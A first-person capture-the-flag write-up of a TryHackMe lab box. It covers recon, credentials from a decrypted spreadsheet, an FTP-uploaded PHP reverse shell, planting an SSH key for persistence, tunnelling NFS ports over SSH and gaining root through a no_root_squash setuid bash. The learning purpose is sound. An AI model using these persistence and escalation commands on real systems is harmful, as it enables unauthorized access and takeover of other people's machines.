This is going to be a detailed room write-up on how we get to the james user and what challenges were faced while port forwarding various ports to mount the NFS share of a user. For more such boxes, check out TryHackMe.
Of all the “hard boxes” I have done to date, none was as challenging as this… Now, again, this wasn’t a hard box, it was just challenging… It’s just hard to spot something as abstract as this. Kudos to NinjaJc01 (aka james) for his amazing efforts on this box. This box. Is. Awesome. TO CHALLENGE YOUR SKILLS TO THEIR FULLEST.
This was a real-life based box. Before I start with the actual writeup I would like you to take a few hints from the “Try Harder” section in case you don’t want to spoil the fun of exploiting stuff on your own. Again, I am just a guy who is still learning, so let me know if I go wrong anywhere.
Most of us were stuck at the james user… I personally took 6 long hours just to find an approach to the user flag residing inside the james home dir.
- Hint 1: Scan for inner ports opened to localhost.
- Hint 2: Is there any service running that could give you access to james dir?
- Hint 3: Think of a way how you can exPORT that service so that you can access it on your attacker machine and move FORWARD…
And this is what we are going to do ahead… now, go on and try harder.
I am using the AttackBox for this because it’s on the internal network and the network speed is no less than 26 Mbps.
If you’re not subscribed, like me… you can still do fast recon on the AttackBox, copy the useful notes to Pastebin and retrieve them on your attacker machine.
nmap -A -oN initial/nmap -vv <IP>
Here we can see that we have 3 ports open:
Great, so we have HTTP open; let’s start with a directory scan before further enumeration.
gobuster dir -u http://IP/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,css,js,txt,phtml,aspx
While this runs, let’s check out FTP and HTTP.
OK, seems like anonymous login is disabled. No problem, we’ll see this later. Let’s get to the website.
Great, we have some users here… (At the time of doing this box I created a username.txt list with all these users scraped with cURL, but never needed it. Oops, sorry for the spoiler.) Let’s view the page source…
Nothing special here either. Let’s get back to our gobuster scan and see if we have something special…
Aha!! A backup directory… Let’s view it…
Cool, let’s download it and extract the zip file.
Alright, so now we have a PGP encrypted file with a key… I didn’t know how to decrypt a PGP encrypted file. I searched online and came up with a method… First we need to import priv.key and then decrypt the file using the -d flag.
But when I viewed decrypt.txt it showed me a bunch of garbage, which seemed to be broken XML? (An .xlsx file is a zip archive of XML parts, which is why the raw bytes look like mangled XML.) I tried changing the extension to decrypt.xml and opening it in the browser; it didn’t work. Later I looked more closely at the file name before the .gpg extension: it was an EXCEL FILE. Likewise, when I ran the file command on it, it told me it was a Microsoft Excel 2007+ file.
Now, there are 2 ways from here… Either switch to a machine where you have Excel installed (because, believe me, hardly anyone has Office installed on their attacker machine, including me; which is a bad thing, you must have an offline way of analysing the files you find during a pentest)
OR you could use Google Sheets to view the file: just upload it and view it there. Also, you could install LibreOffice on your Kali VM (on Ubuntu I guess you get it pre-installed).
Gladly I was still using the AttackBox, so I used the superfast connection to download LibreOffice onto it and then viewed the file (apt install libreoffice).
I opened up LibreOffice Calc and found the following contents in the file.
Oooh. We got some credentials.
Sidenote: Don’t get too excited, those credit card nos. aren’t real I tried them all on netflix.
OK, back to the challenge… Hmm, let’s see if we can use these credentials on SSH.
Permission denied… I tried other usernames as well but they didn’t work, which tells us more about the target: those users may not be present on the system. I wondered what this “publickey,gssapi-keyex” permission denied meant. It was new to me… So I googled it…
Hmm, this message lists the authentication methods the server still accepts (public key and GSSAPI), so password authentication is disabled; to get in over SSH we need a private key. Now, at this point I was a bit confused about where to find such a key.
I then suddenly thought… What if!! The credentials aren’t for SSH; I mean, we have FTP open too, right… So I tried FTP.
Voila, first user paradox, and first password. I got in… Feels great, no? Anyway, when I ran ls I didn’t find anything special, just the same old backups folder (you can try to get it onto your attacker box and extract it, but it’s the same file from which we got paradox’s credentials).
I kept thinking and thinking, talking to myself for about a minute or 2, and observed that this is the same old web directory that I scanned earlier. I solved an almost identical box just a few days ago (couldn’t remember the name) in which we got FTP access to the web directory, uploaded a reverse shell there and triggered it via the browser. So I tried it, and uploaded php-reverse-shell.php (after changing the IP in it to the IP of the AttackBox).
Now let’s browse to http://IP/php-reverse-shell.php…
The site keeps loading…
And we get our reverse shell. Awesome. We got the initial shell. Let’s stabilise it first, and then we will move forward.
You can see that earlier I tried python; it didn’t work, so I tried python3 and proceeded.
Now, if this doesn’t work either, you could try /bin/bash -i (instead of python3) to stabilise your shell. Sounds annoying, but trying is all we’ve got.
7h3 W3b Fl46
Now that we have a shell, let’s find the web flag first. I first searched for the flag like this…
find / -name web.txt 2>/dev/null
It didn’t get me anything… I tried a bunch of things, but couldn’t find any, so I looked at the hint in the task (I personally consider this cheating, because in real life you don’t have any hints; try to avoid them as much as possible).
The Hint: This flag belongs to apache
Ok, got it… So if the flag belongs to apache, it must be in it’s home directory…
which turns out to be /usr/share/httpd
Bingo!! I finally figured out why my find for web.txt wasn’t working… The file was named web.flag instead of web.txt. At least we now know that the flags are stored with a .flag extension, so a find on names ending in .flag would have caught it. Hmm. Let’s move ahead.
P4r4d0x 15 4 57udy 0f f34r
I don’t know what instinct made me try to log in as paradox.
I got a stable shell as user paradox.
Optional: This method came up when I re-deployed the machine on another day for creating this writeup. You can also bypass the SSH password for paradox BY ADDING YOUR PUBLIC KEY TO THE authorized_keys FILE IN PARADOX’S .ssh DIRECTORY.
The usual way is to copy the id_rsa file from the .ssh directory to your attacker machine, change its permissions to 600 and then log in with the -i flag, but there is no such key in the .ssh directory. So we will use the other method that I mentioned above.
You can see in the 1st pane that I used ssh-keygen command to generate a pair of public and private keys, and then cat out my public key in the .ssh directory.
In the second pane I am on the victim machine as paradox, pasting the contents of my public key into authorized_keys. Now let’s see if we can log in via SSH or not.
Without. A. Password.
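The authorized_keys step above is easy to get subtly wrong: sshd runs with StrictModes on by default and silently ignores a key file whose directory or file is group/world writable, and pasting the same key twice clutters the file. Below is an added example (not from the original write-up) of a small POSIX shell helper that installs a public key the way sshd expects it, idempotently. The home directory path and the key material are constructed for the demo; in practice you pass the real home directory and the contents of the .pub file produced by ssh-keygen.

```shell
# Added example, not part of the original write-up. Installs a public key
# into a home directory the way sshd expects: ~/.ssh mode 700,
# authorized_keys mode 600, and the key appended only once. With the default
# StrictModes yes, sshd ignores authorized_keys that are group/world writable,
# which is the usual reason a pasted key "does not work".
install_authorized_key() {
  home_dir="$1"
  pubkey="$2"
  ssh_dir="$home_dir/.ssh"
  auth_file="$ssh_dir/authorized_keys"

  mkdir -p "$ssh_dir" || return 1
  chmod 700 "$ssh_dir" || return 1
  # Create the file if missing, then lock permissions before writing the key.
  [ -f "$auth_file" ] || : > "$auth_file"
  chmod 600 "$auth_file" || return 1
  # Append only if this exact line is not already present (idempotent).
  if ! grep -qxF -- "$pubkey" "$auth_file"; then
    printf '%s\n' "$pubkey" >> "$auth_file"
  fi
}

# Number of keys in a user's authorized_keys (0 if the file is absent).
authorized_key_count() {
  f="$1/.ssh/authorized_keys"
  if [ -f "$f" ]; then
    grep -c . "$f" || true
  else
    echo 0
  fi
}

# Return 0 when the directory and file have exactly the permissions sshd wants.
authorized_key_perms_ok() {
  d="$1/.ssh"
  [ -n "$(find "$d" -prune -perm 700)" ] && \
  [ -n "$(find "$d/authorized_keys" -prune -perm 600)" ]
}

# Constructed demo key (not real key material). In practice use the output of
# `ssh-keygen -t ed25519 -f ./key` and the contents of key.pub.
DEMO_PUBKEY='ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyMaterialNotRealxxxxxxxxxxxx attacker@kali'

# Usage on the target, as paradox:
#   install_authorized_key "$HOME" "$DEMO_PUBKEY"
```

Run it in the shell you already have as paradox, then connect with ssh -i key paradox@IP. If the login still asks for a password, check sshd's log on the box for an "Authentication refused: bad ownership or modes" message, which points straight at the permissions this helper sets.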
1 f33l l0n3ly 4lr34dy
Hmm, the user flag at this point, I thought, wouldn’t be a challenge. I mean, I completed this room till here in what, 45 mins? I felt over-confident. But I didn’t know that this was going to be the toughest CHALLENGE (not hardest; because it is hackable, it’s not like it’s an invincible boss level, it’s pretty normal to go on once you know what you have to do, but until then… it was like my hell loop 😫 ) I could ever face.
Now, feel free to skip the rest of the write-up up till “7h3 U53r Fl46”, where I summarise how it all can be done in 1 go. If you want to know how it all came together with trial and error… KEEP CALM AND KEEP READING.
L057 1n 71m3
All right, due to my over-confidence I didn’t check any privesc cheatsheets, just roamed here and there to find something useful. But as we know, I couldn’t. Starting with:
Hmm, the last line… Seems like we need to use the -S flag too.
Sadly we can’t.
My IP seemed changed from this section onwards… This is because I accidentally clicked terminate instead of add 1 hour(while creating this writeup). FML.
Let’s see if we have any SUIDs/SGIDs
I listed them, but these are dead ends… I banged my head way more on “HOW TO CONVERT SUID WITH SUDO PRIVILEGES”, because both of them can give root if run with sudo permissions; sadly our user can’t do that. And with just the SUID bit set they are of no use. Trying them would be banging our heads against the wall. I personally wasted about 30 mins on this one for no reason; I thought I’d research something new. Ugh, never mind, moving forward.
Let’s check for any cronjobs…
Nothing here either… Later got tired and watched the hint for Question 2 😅
Hint 2: “This flag belongs to james”
I thought, ohh, that’s why nothing is available for us here. Alright, let’s look at james…
OK, I then went into a new terminal and tried all 3 passwords found in the Excel sheet from the backups directory. But that didn’t work either.
OKAY, at this point I had ideas, but didn’t want to try them #FeelingLazy, as the box till here was typical easy for me. So, I went directly for LinPeas.
Oops! wget isn’t on the box… I guess they don’t want us to use LinPeas.
SideNote: I didn’t think of cURLing the linpeas file from the AttackBox, which I generally don’t forget as an alternative. This often happens when working on a box, so stop being over-confident and keep a checklist of things.
So, I tried various other methods, like doing a recursive search for the james user in any file.
grep -iRl james /
OR a recursive search for OpenSSH key files, in case there is a hidden SSH key for james lying around.
grep -iRl "BEGIN OPENSSH" /
but I didn’t find anything either. I also tried searching for files owned by james, hoping there would be a secret note for us to read, but the only files I could find were james’s home directory and a mail file in the spool directory, which unfortunately wasn’t readable by us. In fact they didn’t contain any data.
Tip: Do check the /opt directory once, manually. That directory stays empty most of the time. If not, there are user-stored files there, which can be useful to us.
I was going crazy and couldn’t think properly. Almost 2 hours passed by… I couldn’t find anything; I thought I might be missing something, so I again shifted my focus to linpeas. I went for copy-pasting the linpeas file through the terminal.
Note: You noticed that I was on the AttackBox, and hence copy-pasting anything as big as the linpeas code wasn’t happening for me. Call it the buffer size limit for copy-pasting via the clipboard, or just a bug in the terminal not pasting a buffer that long…
Ohh, seems like I can’t copy-paste. Great.
I pushed the chair back, stood up, had a little water. Thought of “HOW CAN I TRANSFER THE FILE TO THE SERVER”. A minute later I came back and opened up a notepad to write the following things.
- SWITCH BACK TO PERSONAL MACHINE(WHICH HAS MORE BUFFER SIZE TO COPY PASTE)
Gladly, I got linpeas over with the first one. I learnt one more thing that day… I knew all of the following (all 4 worked); the only thing needed was to KEEP CALM AND THINK PEACEFULLY.
Yea, I missed the dot there, never mind. Moving on, I ran the scan, and from there I noticed a few things that seemed suspicious and tried them, re-tried them, re-re-tried some of them. I had a doubt on this one…
But in a full port scan there was no open NFS service either… Maybe the port is filtered and blocking nmap probes? So I also ran a custom-made port scanner I wrote a few months back, but didn’t get anything either. I tried enumerating the log files so that I could find at least something… Still nothing😭. I was sure that no_root_squash had something to do with the box. SO FOR THE LAST TIME I THOUGHT, what if I could mount the directory locally on the box itself and view it.
Hurray, that means there is an NFS service running on an internal port… And we can use it to mount the share, so I went ahead and tried to mount it right away…
Then I remembered that mount needs to be run with sudo privileges. Ugghhh, WHAT THE HASH!!!. By then I knew that this was not the intended method and enumerated something else… But NOTHING ELSE WAS THERE…
“Uh-Oh! You have deployed this machine for too long” warning popped up when I tried to extend the machine for further more time. At this time I lost all the hopes and I literally went for help on TryHackMe’s Discord server… Where I was reminded !rule 13, No hints are to be given before 72 hours are completed of the room release. Alright, then I went on TryHackMe’s Forum and created a new thread, hoping that somebody would answer me 😭.
I lost track of time; I forgot that I had a class to attend about an hour ago, and I missed it. The room release was about to be 24 hours old… I was sick and tired of sitting in front of my system for more than 5 hours after the last break I took. I needed some time off, some time to relax.
7h3y c4ll m3 4 m4dm4n
I went off for lunch around 6pm, fell asleep and woke up around 12pm. Washed my face, kinda cursed myself in the mirror for not being able to solve a medium box. Then had some snacks and checked my messages. A few people from the TryHackMe Discord PM’ed me: “hey, are you able to solve the room yet? I am still stuck at getting to the james user…” I replied, “been stuck there for 7 hours, tried to run mount on the victim’s machine but didn’t have root privileges to do so… Ugh! I wish I had them”. Chatted a little bit and then went back to see, just by chance, if there was any change in the box 😅. I hadn’t even opened my VM properly when my dad came into my room and scolded me for “sleeping all day and now you think you should play games?!”. I ignored him, and got back to my desk.
That night I felt confident because I was working with my personal attackbox and I know how great it is to work-out with your personal things.
When I went back and opened TryHackMe, I had a few messages in PM too, regarding the thread I posted, likewise asking for hints; well, I wasn’t james myself, so how could I give any?? Anyhow, I found a reply to the thread that I posted…
Now, the idea I got was, what if… I was able to… run the NFS mount as root, locally on my attacker machine (because locally I have access to root privileges on the system)? But I knew there weren’t any external ports open for the mount, right? The mount was only available locally… So, what if those ports could be made available on our attacker machine… So I did a simple Google search… “HOW TO USE LOCAL PORTS OF ONE MACHINE ON ANOTHER”
Here I remembered that I did port forwarding earlier for accessing the Jenkins server hosted on the “Internal” network (it’s a room on TryHackMe named “Internal”. Do check it out!). So it took me just a few hours that night to see “THAT ALL I HAD TO DO WAS PORT FORWARD THE NFS PORTS AND MOUNT THE SHARED FILE SYSTEM LOCALLY ON MY ATTACKER MACHINE WITH ROOT ACCESS”. Then I did my normal research on how to port forward the NFS file system. I found some links… Followed the tutorial and figured out that it’s pretty easy…
Although there were a few blanks in my thinking… Starting with…
- Which port to forward?
Well when it comes to analyzing the port activity… I close my eyes and use,
YOU GOTTA BE KIDDIN’ ME!!! AGAINNN!!!??? So, as usual, I searched the web… “ALTERNATIVE TO NETSTAT LINUX”
I love the google!! 💙 ❤️ 💛 💙 💚 ❤️
ss is an alternative to netstat that we can use. So if we run a basic command like:
it lists all the sockets on the host (ss reports sockets, not processes; add -p to see the owning process). Now, if we want to find “local ports” that are listening, we need to filter the output for a “Local Address” of either 0.0.0.0 or 127.0.0.1. We can use grep for that…
ss -an | grep -E "0.0.0.0|127.0.0.1"
Now, you can filter it further too, to get a list of ports only. Note that only the sockets in LISTEN state are of use to us, as those are the ports that will accept a connection when a mount request is made. 127.0.0.1 means the service is bound to loopback only and is invisible to an external nmap scan, while 0.0.0.0 means it is bound on every interface. Moreover, you can view the service name mapped to each port by just running
ss -a | grep -E "0.0.0.0|127.0.0.1"
i.e. running without the -n flag (ss then resolves port numbers to service names from /etc/services).
Now, try to relate, using the above image, which port is running which service. For us, we just need the NFS port… That turns out to be 2049. Great, all we gotta do is forward this port via SSH tunneling (port forwarding), and then mount the james share on our attacker machine using sudo…
In pane 1 I created an SSH tunnel from the victim machine’s port 2049 to my local port 2049. In pane 2 I tried to mount the file system, but got an error.
Huh, that’s strange… What else do you need to work? I searched for this on Google; it said TO RESTART THE SERVICE TO FIX THE ERROR…
Not kiddin’, that was literally my reaction at that moment of the night. Moving on… I scratched my head for a bit… I thought maybe that’s not what the mount needs… I suspected another port… the mountd port (i.e. 20048), so let’s connect to that instead…
Nope, didn’t work either… Now, after this, I literally tried to tunnel every port, randomly. Didn’t work… And I went crazy…
I then did a small research on “HOW TO VIEW NFS SHARE VIA SSH TUNNELING”, and I came up with this link: Tunneling NFS through SSH???? (unix.com).
If you look carefully, this guy forwarded 2 ports to link NFS to his local machine… Firstly the NFS port, then the mountd port… Alright, seems fair enough. Let’s try that.
OK, in pane 1 I have the mountd port forwarded, and in pane 2 I have the NFS port forwarded… In pane 0 you can see that the mount didn’t work, same error. I wonder why?
I scratched my head a bit… Kept wondering why I wasn’t getting the shell, so on the same forum I scrolled a bit, and found this answer…
He suggested forwarding the RPC channel too… So I thought, why not, let’s add a third port…
Oh oh, what’s this… Maybe we’re not allowed to use port 111. But that’s not the problem… I mean, when we view the activity on port 111 on the Overpass machine it was in listening mode… And we know that listening ports can be forwarded (so that connections to the listening port can also be made from elsewhere), but ssh cannot bind the local end of a forward to a port that something on our own machine is already listening on…
Well, if that’s the case, let’s verify it.
Yep, right, another local port works without changing the destination port… The problem is on my side 😅. Or you could just run the following command to see the activity on a port.
netstat -antp | grep 111
This error occurred while creating this writeup, because when I previously worked on this machine I did the stuff described before to test a few things and started rpcbind.service via systemctl, which was now occupying the listening port 111. Thanks to @NinjaJc01 on Discord for the idea that the service was being managed by systemd running as PID 1. And when I tried to kill that process it shut down my system, and on restart the service came back. So it was annoying.
I told this to you so just in case if you get stuck in situation like this, you can get yourself out of it.
Firstly, close the rpcbind service itself, disable it and then mask it.
sudo systemctl stop rpcbind
sudo systemctl disable rpcbind
sudo systemctl mask rpcbind
At last close the rpcbind.socket and then disable it too.
You can see that our port is now closed. So, now that the port is finally closed… Let’s try forwarding the third port and see if we can access james or not…
Oh oh, what’s this? Seems like the service we just stopped and masked needs to be running for this to work (mount.nfs wants to register with the local lock manager, which needs rpcbind)…
We could just specify -o nolock instead, which disables client-side NFS file locking and so removes the need for a local rpcbind/statd, and looks much easier… so let’s run the same command with nolock appended to it.
7h3 U53r Fl46
Let’s summarise our steps…
- Starting with bringing linpeas.sh to the Overpass machine via cURL, fixing the permissions and running the linpeas scan.
- Noting the no_root_squash property, I tried to establish a local NFS mount but couldn’t because of the lack of root permissions.
- Searched for internal ports, i.e. via ss -an (netstat wasn’t on the machine). And figured out a way to get the NFS working, i.e. port forwarding.
- So I port forwarded the NFS port… But it didn’t work, so I searched more and saw that to reach this share over SSH we need to tunnel 3 ports: rpcbind/portmapper (111, which the client asks to locate the other RPC services), mountd (20048, which answers the mount request itself and hands back the root file handle) and nfsd (2049, which serves the actual file operations). The fact that 2049 alone was not enough tells us the share is served over NFSv3; an NFSv4 export would have needed only 2049.
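To tie the port hunt, the "address already in use" detour and the final mount together, here is an added example (not from the original write-up) in POSIX shell. It filters a constructed sample of ss output down to the loopback-only listeners, keeps the three NFSv3 ports, checks that the local ends are free (the rpcbind problem from above), and prints the ssh and mount command lines. The ss sample, the export path /home/james, the mount point /mnt/james and the target address are assumptions for the demo; the real export path comes from showmount -e 127.0.0.1 once the tunnel is up.

```shell
# Added example, not part of the original write-up. Picks the loopback-only
# listeners out of `ss -tan` output, keeps the three ports an NFSv3 client
# needs, checks the local ends are free, and prints the ssh/mount commands.

# Constructed sample of `ss -tan` output (not captured from the real box).
SAMPLE_SS='State   Recv-Q Send-Q Local Address:Port   Peer Address:Port
LISTEN  0      128    0.0.0.0:22           0.0.0.0:*
LISTEN  0      128    0.0.0.0:80           0.0.0.0:*
LISTEN  0      32     0.0.0.0:21           0.0.0.0:*
LISTEN  0      128    127.0.0.1:111        0.0.0.0:*
LISTEN  0      64     127.0.0.1:2049       0.0.0.0:*
LISTEN  0      128    127.0.0.1:20048      0.0.0.0:*
ESTAB   0      0      10.10.1.2:22         10.8.0.5:51544'

# Ports of LISTEN sockets bound to 127.0.0.1 only (invisible to an external
# nmap), one per line, numerically sorted. Reads ss output on stdin.
loopback_listen_ports() {
  awk '$1 == "LISTEN" { n = split($4, a, ":"); if (a[1] == "127.0.0.1") print a[n] }' | sort -n
}

# Keep just rpcbind (111), nfsd (2049) and mountd (20048).
nfs_v3_ports() {
  grep -xE '111|2049|20048'
}

# Turn a list of ports on stdin into ssh -L arguments, binding the local end
# to loopback so the forwarded services are not exposed to our own network.
ssh_forward_args() {
  args=""
  while read -r port; do
    args="$args -L 127.0.0.1:${port}:127.0.0.1:${port}"
  done
  printf '%s' "${args# }"
}

# 0 if nothing on this machine listens on TCP port $1. ssh -L cannot bind a
# local port that is already taken, which is what a local rpcbind on 111 causes.
local_port_free() {
  ! ss -ltn 2>/dev/null | awk 'NR > 1 { print $4 }' | grep -qE "[:.]$1\$"
}

# Assemble the full tunnel command for the given ss output, user and host.
ssh_tunnel_command() {
  ports="$(printf '%s\n' "$1" | loopback_listen_ports | nfs_v3_ports | ssh_forward_args)"
  printf 'ssh -N %s %s@%s' "$ports" "$2" "$3"
}

# Mount command for the forwarded share ($1 = export path, $2 = mount point,
# both assumptions here). proto/mountproto are forced to TCP because ssh -L only
# carries TCP; port/mountport point the client at the tunnelled ports; nolock
# avoids needing a local rpcbind/statd for the NFS lock manager.
nfs_mount_command() {
  printf 'sudo mount -t nfs -o vers=3,proto=tcp,mountproto=tcp,port=2049,mountport=20048,nolock 127.0.0.1:%s %s' "$1" "$2"
}
```

Two things worth knowing before running the printed commands: binding local ports below 1024 (111 here) requires running ssh as root, and because mountport= tells mount.nfs where mountd is, the client does not need to consult rpcbind at all, so if you would rather not run ssh as root you can leave 111 out of the tunnel and forward only 2049 and 20048.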
Finally got the USER FLAGGG 😢 after so long.
Sidenote: This wasn’t an absolute victory… But I felt really awesome after it. 3:30am and I felt blessed. Coz, that night only took me 1.5 hours to get the user flag.
Now, as I said in the starting of the writeup this wasn’t a tough room to solve, it was challenging, but once, you know what to do, rest all is a little bit of research. 😉
Ok, enough with the crap talk let’s move on to the r007 flag
7h3 R007 Fl46
OK, I’m not gonna lie, I solved a room before on how to get root through no_root_squash. So this hardly took me 2 mins (MAX).
sudo su; cd /tmp; cp /bin/bash . ; chmod +s bash;
(cd into the directory where you mounted the james share, /tmp here. The setuid bit has to go on the copy inside the share, not on /bin/bash of your own machine; because the export has no_root_squash, your local root is root on the server side too, so the copy lands in james’s home as a root-owned setuid binary. One caveat: the bash you copy in must actually run on the target, i.e. same architecture and a compatible libc. If the copy from your attacker box fails to start there, fetch the target’s own /bin/bash over first and plant that instead.)
Also, through the same mount, add your public key to james’s authorized_keys so that you can log in to his account via SSH.
Log in as james and run the SUID bash with the -p flag set (./bash -p); without -p, bash drops the effective UID back to the real one and you would simply stay james.
You got root, and you know where you can find the root flag. 😉
The other way that often gets suggested is a setuid shell script:
echo "/bin/bash -p" > bash; chmod +s bash;
Be aware, though, that the Linux kernel ignores the setuid bit on interpreted scripts, so running this file as james gives you a shell as james, not root. If you want a wrapper rather than a copy of bash, it has to be a compiled binary (a few lines of C that call setuid(0) and exec /bin/bash -p, with chmod +s applied to the binary through the mount).
First of all, this was one of the longest writeups I have ever written lol… Now if you have reached this point, having read all of it, CONGRATS, because even I didn’t have the stamina to read all of it in one go; this is day 3 of making this writeup and today I finally finished it.
What’s with such a long write-up?
- Ikr, it was tiring; it’s because there were a lot of people messaging me on Discord and even via direct message on the TryHackMe server to give them hints and tell them how I solved the room, so I LITERALLY WENT ALL N00B AND STARTED EXPLAINING EVERY SINGLE BIT.
Now, I don’t know if you guys liked the way I explained this writeup, enjoyed the extra information I shared, or if you think that I OVERSHARED EVEN THE VERY BASIC STUFF. I just don’t know, so please… be kind enough to let me know in the comments. I could really use your response. Plus, do let me know if you want more such writeups.
Lastly I just wanna say that I am still learning, or maybe I am just another n00b whose luck worked and who did the room in the first 36 hours of its release, without any hints, just some music to keep me active throughout the late night.
IMPORTANT: IF YOU FIND ANY ISSUES WITH THE WRITEUP OR HAVE ANY QUERIES, FEEL FREE TO REACH OUT TO ME ON DISCORD: j4x0n, or you can find my socials at the top of the writeup.